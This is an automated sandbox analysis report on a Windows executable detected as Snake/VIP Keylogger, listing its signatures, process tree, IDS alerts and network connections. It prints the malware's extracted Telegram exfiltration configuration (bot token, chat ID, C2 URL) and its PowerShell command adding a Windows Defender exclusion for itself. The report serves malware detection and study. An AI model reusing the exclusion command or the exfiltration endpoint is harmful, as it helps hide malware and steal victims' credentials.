Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Yef4EqsQha.exe

Overview

General Information

Sample name:Yef4EqsQha.exe
renamed because original name is a hash value
Original sample name:f2675f59a65add81d32683e6ec1a2aec2c37547df4ef331c21b5f498ccee7897.exe
Analysis ID:1588250
MD5:91ccccf28bcd650fc1f8e5256891211c
SHA1:35ceec260d23f1aaa3b948060a0f4c5c926f9b73
SHA256:f2675f59a65add81d32683e6ec1a2aec2c37547df4ef331c21b5f498ccee7897
Tags:exeuser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Yef4EqsQha.exe (PID: 7640 cmdline: "C:\Users\user\Desktop\Yef4EqsQha.exe" MD5: 91CCCCF28BCD650FC1F8E5256891211C)
    • powershell.exe (PID: 7848 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Yef4EqsQha.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8060 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • Yef4EqsQha.exe (PID: 7856 cmdline: "C:\Users\user\Desktop\Yef4EqsQha.exe" MD5: 91CCCCF28BCD650FC1F8E5256891211C)
    • Yef4EqsQha.exe (PID: 7872 cmdline: "C:\Users\user\Desktop\Yef4EqsQha.exe" MD5: 91CCCCF28BCD650FC1F8E5256891211C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendMessage"}

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A", "Chat id": "-4517865277"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A", "Chat_id": "-4517865277", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3830796545.00000000029F2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2d031:$a1: get_encryptedPassword
          • 0x2d346:$a2: get_encryptedUsername
          • 0x2ce41:$a3: get_timePasswordChanged
          • 0x2cf4a:$a4: get_passwordField
          • 0x2d047:$a5: set_encryptedPassword
          • 0x2e6e5:$a7: get_logins
          • 0x2e648:$a10: KeyLoggerEventArgs
          • 0x2e2ad:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 14 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.Yef4EqsQha.exe.3cce508.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.Yef4EqsQha.exe.3cce508.2.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              0.2.Yef4EqsQha.exe.3cce508.2.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                6.2.Yef4EqsQha.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  6.2.Yef4EqsQha.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    Click to see the 26 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Yef4EqsQha.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Yef4EqsQha.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Yef4EqsQha.exe", ParentImage: C:\Users\user\Desktop\Yef4EqsQha.exe, ParentProcessId: 7640, ParentProcessName: Yef4EqsQha.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Yef4EqsQha.exe", ProcessId: 7848, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Yef4EqsQha.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Yef4EqsQha.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Yef4EqsQha.exe", ParentImage: C:\Users\user\Desktop\Yef4EqsQha.exe, ParentProcessId: 7640, ParentProcessName: Yef4EqsQha.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Yef4EqsQha.exe", ProcessId: 7848, ProcessName: powershell.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Yef4EqsQha.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Yef4EqsQha.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Yef4EqsQha.exe", ParentImage: C:\Users\user\Desktop\Yef4EqsQha.exe, ParentProcessId: 7640, ParentProcessName: Yef4EqsQha.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Yef4EqsQha.exe", ProcessId: 7848, ProcessName: powershell.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-10T23:06:26.398364+010028033053Unknown Traffic192.168.2.749751104.21.112.1443TCP
                    2025-01-10T23:06:29.105641+010028033053Unknown Traffic192.168.2.749773104.21.112.1443TCP
                    2025-01-10T23:06:34.333208+010028033053Unknown Traffic192.168.2.749815104.21.112.1443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-10T23:06:24.708171+010028032742Potentially Bad Traffic192.168.2.749732193.122.6.16880TCP
                    2025-01-10T23:06:25.833163+010028032742Potentially Bad Traffic192.168.2.749732193.122.6.16880TCP
                    2025-01-10T23:06:27.098861+010028032742Potentially Bad Traffic192.168.2.749757193.122.6.16880TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-10T23:06:44.285053+010018100081Potentially Bad Traffic192.168.2.749884149.154.167.220443TCP
                    2025-01-10T23:07:06.926915+010018100081Potentially Bad Traffic192.168.2.749995149.154.167.220443TCP
                    2025-01-10T23:07:07.863530+010018100081Potentially Bad Traffic192.168.2.749996149.154.167.220443TCP
                    2025-01-10T23:07:08.804424+010018100081Potentially Bad Traffic192.168.2.749997149.154.167.220443TCP
                    2025-01-10T23:07:09.780103+010018100081Potentially Bad Traffic192.168.2.749998149.154.167.220443TCP
                    2025-01-10T23:07:10.733606+010018100081Potentially Bad Traffic192.168.2.749999149.154.167.220443TCP
                    2025-01-10T23:07:11.643892+010018100081Potentially Bad Traffic192.168.2.750000149.154.167.220443TCP
                    2025-01-10T23:07:15.656959+010018100081Potentially Bad Traffic192.168.2.750001149.154.167.220443TCP
                    2025-01-10T23:07:16.578900+010018100081Potentially Bad Traffic192.168.2.750002149.154.167.220443TCP
                    2025-01-10T23:07:17.488276+010018100081Potentially Bad Traffic192.168.2.750004149.154.167.220443TCP
                    2025-01-10T23:07:18.467441+010018100081Potentially Bad Traffic192.168.2.750005149.154.167.220443TCP
                    2025-01-10T23:07:19.405961+010018100081Potentially Bad Traffic192.168.2.750006149.154.167.220443TCP
                    2025-01-10T23:07:23.344119+010018100081Potentially Bad Traffic192.168.2.750007149.154.167.220443TCP
                    2025-01-10T23:07:24.333296+010018100081Potentially Bad Traffic192.168.2.750008149.154.167.220443TCP
                    2025-01-10T23:07:25.219888+010018100081Potentially Bad Traffic192.168.2.750009149.154.167.220443TCP
                    2025-01-10T23:07:26.177148+010018100081Potentially Bad Traffic192.168.2.750010149.154.167.220443TCP
                    2025-01-10T23:07:27.078510+010018100081Potentially Bad Traffic192.168.2.750011149.154.167.220443TCP
                    2025-01-10T23:07:31.059922+010018100081Potentially Bad Traffic192.168.2.750012149.154.167.220443TCP
                    2025-01-10T23:07:32.005003+010018100081Potentially Bad Traffic192.168.2.750013149.154.167.220443TCP
                    2025-01-10T23:07:33.053240+010018100081Potentially Bad Traffic192.168.2.750014149.154.167.220443TCP
                    2025-01-10T23:07:34.160472+010018100081Potentially Bad Traffic192.168.2.750015149.154.167.220443TCP
                    2025-01-10T23:07:35.171257+010018100081Potentially Bad Traffic192.168.2.750016149.154.167.220443TCP
                    2025-01-10T23:07:36.249133+010018100081Potentially Bad Traffic192.168.2.750017149.154.167.220443TCP
                    2025-01-10T23:07:45.402268+010018100081Potentially Bad Traffic192.168.2.750018149.154.167.220443TCP
                    2025-01-10T23:07:46.349426+010018100081Potentially Bad Traffic192.168.2.750019149.154.167.220443TCP
                    2025-01-10T23:07:47.301327+010018100081Potentially Bad Traffic192.168.2.750020149.154.167.220443TCP
                    2025-01-10T23:07:48.309609+010018100081Potentially Bad Traffic192.168.2.750021149.154.167.220443TCP
                    2025-01-10T23:07:49.232355+010018100081Potentially Bad Traffic192.168.2.750022149.154.167.220443TCP
                    2025-01-10T23:07:53.256177+010018100081Potentially Bad Traffic192.168.2.750023149.154.167.220443TCP
                    2025-01-10T23:07:54.273003+010018100081Potentially Bad Traffic192.168.2.750024149.154.167.220443TCP
                    2025-01-10T23:07:55.390529+010018100081Potentially Bad Traffic192.168.2.750025149.154.167.220443TCP
                    2025-01-10T23:07:56.302892+010018100081Potentially Bad Traffic192.168.2.750026149.154.167.220443TCP
                    2025-01-10T23:07:57.214769+010018100081Potentially Bad Traffic192.168.2.750027149.154.167.220443TCP
                    2025-01-10T23:08:01.186194+010018100081Potentially Bad Traffic192.168.2.750028149.154.167.220443TCP
                    2025-01-10T23:08:02.259667+010018100081Potentially Bad Traffic192.168.2.750029149.154.167.220443TCP
                    2025-01-10T23:08:03.211107+010018100081Potentially Bad Traffic192.168.2.750030149.154.167.220443TCP
                    2025-01-10T23:08:04.158685+010018100081Potentially Bad Traffic192.168.2.750031149.154.167.220443TCP
                    2025-01-10T23:08:05.117022+010018100081Potentially Bad Traffic192.168.2.750032149.154.167.220443TCP
                    2025-01-10T23:08:09.074400+010018100081Potentially Bad Traffic192.168.2.750033149.154.167.220443TCP
                    2025-01-10T23:08:10.116286+010018100081Potentially Bad Traffic192.168.2.750034149.154.167.220443TCP
                    2025-01-10T23:08:11.189173+010018100081Potentially Bad Traffic192.168.2.750035149.154.167.220443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-10T23:06:36.689951+010018100071Potentially Bad Traffic192.168.2.749834149.154.167.220443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A", "Chat_id": "-4517865277", "Version": "4.4"}
                    Source: 0.2.Yef4EqsQha.exe.3cce508.2.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A", "Chat id": "-4517865277"}
                    Source: Yef4EqsQha.exe.7872.6.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendMessage"}
                    Multi AV Scanner detection for submitted file
                    Source: Yef4EqsQha.exeReversingLabs: Detection: 82%
                    Source: Yef4EqsQha.exeVirustotal: Detection: 70%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: Yef4EqsQha.exeJoe Sandbox ML: detected

                    Location Tracking

                    barindex
                    Tries to detect the country of the analysis system (by using the IP)
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Yef4EqsQha.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49744 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 192.168.2.7:49807 -> 104.21.112.1:443 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49834 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50037 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50038 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50039 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50040 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50041 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50042 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50043 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50044 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50045 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50046 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50047 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50048 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50049 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50050 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50051 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50052 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50053 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50054 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50055 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50056 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50057 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50058 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50059 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50060 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50061 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50062 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50063 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50064 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50065 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50066 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50067 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50068 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50069 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50070 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50071 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50072 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50073 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50074 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50075 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50076 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50077 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50079 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50080 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50081 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50082 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50084 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50085 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50086 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50087 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50088 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50089 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50090 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50091 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50092 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50094 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50095 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50096 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50097 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50098 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50099 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50100 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50101 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50102 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50103 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50104 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50105 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50106 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50107 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50108 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50109 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50110 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50111 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50112 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50113 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50114 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50115 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50116 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50117 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50118 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50119 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50120 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50121 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50122 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50123 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50124 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50125 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50126 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50127 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50128 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50129 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50130 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50131 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50132 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50133 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50134 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50135 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50136 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50137 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50138 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50139 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50140 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50141 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50142 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50143 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50144 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50145 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50146 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50147 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50148 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50149 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50150 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50151 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50152 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50153 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50154 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50155 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50156 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50157 version: TLS 1.2
